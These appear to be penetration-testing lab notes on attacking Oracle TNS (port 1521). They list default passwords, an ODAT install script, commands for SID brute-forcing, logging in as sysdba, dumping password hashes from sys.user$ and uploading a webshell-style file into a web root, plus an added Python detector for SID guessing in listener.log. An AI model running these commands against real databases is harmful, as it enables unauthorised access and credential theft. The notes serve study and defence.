
Oracle TNS - 1521

  • TCP 1521
  • The Oracle Transparent Network Substrate (TNS) server is a communication protocol that allows communication between Oracle DBs and applications on the network.
  • Supports the IPX/SPX and TCP/IP protocol stacks
  • Built-in encryption; used by enterprises
  • Each database or service has a unique entry in the tnsnames.ora file, which holds the information clients need to connect to the service. An entry consists of:
    • a name for the service,
    • the network location of the service
    • the database or service name that clients should use when connecting to the service
  • The listener.ora file is a server-side configuration file
  • It defines the listener process's properties and parameters
  • The listener process is responsible for receiving incoming client requests and forwarding them to the appropriate Oracle database instance.
  • In short, the client-side Oracle Net Services software uses the tnsnames.ora file to resolve service names to network addresses, while the listener process uses the listener.ora file to determine the services it should listen to and the behavior of the listener.
  • Oracle databases can be protected by using a so-called PL/SQL Exclusion List (PlsqlExclusionList). It is a user-created text file that needs to be placed in the $ORACLE_HOME/sqldeveloper directory.
  • It serves as a blacklist

Default Config:

  • The Oracle TNS configuration files are called tnsnames.ora and listener.ora and are typically located in the $ORACLE_HOME/network/admin directory
  • Oracle 9 default password - CHANGE_ON_INSTALL
  • Oracle 10 has no default password set.
  • Oracle DBSNMP default password - dbsnmp

#!/bin/bash
# Install ODAT together with the Oracle Instant Client and sqlplus.

sudo apt-get install libaio1 python3-dev alien -y
git clone https://github.com/quentinhardy/odat.git
cd odat/
git submodule init
git submodule update
# Oracle Instant Client (basic package and sqlplus), unpacked into ./instantclient_21_12
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
# Absolute path, so the libraries and sqlplus are still found after changing directory
export LD_LIBRARY_PATH="$PWD/instantclient_21_12:$LD_LIBRARY_PATH"
export PATH="$LD_LIBRARY_PATH:$PATH"
# Python dependencies used by ODAT
pip3 install cx_Oracle
sudo apt-get install python3-scapy -y
sudo pip3 install colorlog termcolor passlib python-libnmap
sudo apt-get install build-essential libgmp-dev -y
pip3 install pycryptodome
  • Run this script to install ODAT, or download a package from https://github.com/quentinhardy/odat and extract it with sudo tar -xvf <package>
  • ODAT is the Oracle Database Attacking Tool
  • For Oracle RDBMS, a System Identifier (SID) is given to every db instance.
  • During a connection, the client uses the SID to identify which db instance to connect to.
  • If not specified, the default value from the tnsnames.ora file will be used
  • If incorrectly specified, the connection fails.
  • Use Nmap, ODAT or Hydra to guess the SID

COMMANDS:

  • sudo nmap -p1521 -sV 10.129.204.235 --open --script oracle-sid-brute
  • ./odat.py all -s 10.129.204.235
  • Found creds using odat
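
SID guessing like the above leaves a trail on the server: the listener refuses each wrong guess with TNS-12505 (unknown SID) or TNS-12514 (unknown service name). The following is an added example, not part of the original notes, that flags clients refused for several different names; the listener.log line layout, the sample lines and the name `sid_guessing_sources` are assumptions made for illustration.

```python
import re
from collections import defaultdict

# Constructed sample lines. Assumed text layout of listener.log:
# timestamp * connect data * client address * event * SID/service * return code
SAMPLE_LOG = """\
21-JUL-2023 10:12:01 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=sqlplus)(HOST=app01)(USER=oracle))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.0.2.10)(PORT=50110)) * establish * XE * 0
21-JUL-2023 10:15:40 * (CONNECT_DATA=(SID=ORCL)(CID=(PROGRAM=)(HOST=ws)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=198.51.100.7)(PORT=41001)) * establish * ORCL * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
21-JUL-2023 10:15:41 * (CONNECT_DATA=(SID=PROD)(CID=(PROGRAM=)(HOST=ws)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=198.51.100.7)(PORT=41002)) * establish * PROD * 12505
21-JUL-2023 10:15:41 * (CONNECT_DATA=(SID=TEST)(CID=(PROGRAM=)(HOST=ws)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=198.51.100.7)(PORT=41003)) * establish * TEST * 12505
21-JUL-2023 10:15:42 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=)(HOST=ws)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=198.51.100.7)(PORT=41004)) * establish * XE * 0
21-JUL-2023 11:02:13 * (CONNECT_DATA=(SID=XEE)(CID=(PROGRAM=sqlplus)(HOST=app01)(USER=oracle))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.0.2.10)(PORT=50230)) * establish * XEE * 12505
"""

# Requested SID or service name, client IP from the ADDRESS block, return code.
LINE = re.compile(
    r"\((?:SID|SERVICE_NAME)=(?P<name>[^)]*)\).*?\(HOST=(?P<host>[\d.]+)\)"
    r"\(PORT=\d+\)\) \* establish \* \S+ \* (?P<code>\d+)$")

# TNS-12505: unknown SID, TNS-12514: unknown service name
UNKNOWN_TARGET = {"12505", "12514"}

def sid_guessing_sources(log_text, min_distinct=3):
    """Return {client_ip: sorted refused names} for clients that were refused
    for at least `min_distinct` different SID/service names."""
    failed = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE.search(line.strip())
        if m and m["code"] in UNKNOWN_TARGET:
            failed[m["host"]].add(m["name"].upper())
    return {ip: sorted(names) for ip, names in failed.items()
            if len(names) >= min_distinct}

if __name__ == "__main__":
    for ip, names in sid_guessing_sources(SAMPLE_LOG).items():
        print(f"{ip}: refused for {len(names)} names: {', '.join(names)}")
```

Counting distinct names rather than raw failures keeps a single mistyped SID from a legitimate client (192.0.2.10 in the sample) below the threshold.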

SQLPlus setup instructions

  • sqlplus scott/tiger@10.129.204.235/XE
  • Connect to the SQL instance using sqlplus
  • If we get a libsqlplus error, run the following:
sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig
  • SQLPLUS Commands - here

Database enum:

  • sqlplus scott/tiger@10.129.204.235/XE as sysdba
  • select table_name from all_tables;
  • select * from user_role_privs;
  • select name, password from sys.user$;

  • Uploading a webshell if a webserver is running

Uploading a webshell using odat.

  • ./odat.py utlfile -s 10.129.204.235 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt
  • cURL to get the file.
  • curl -X GET http://10.129.204.235/testing.txt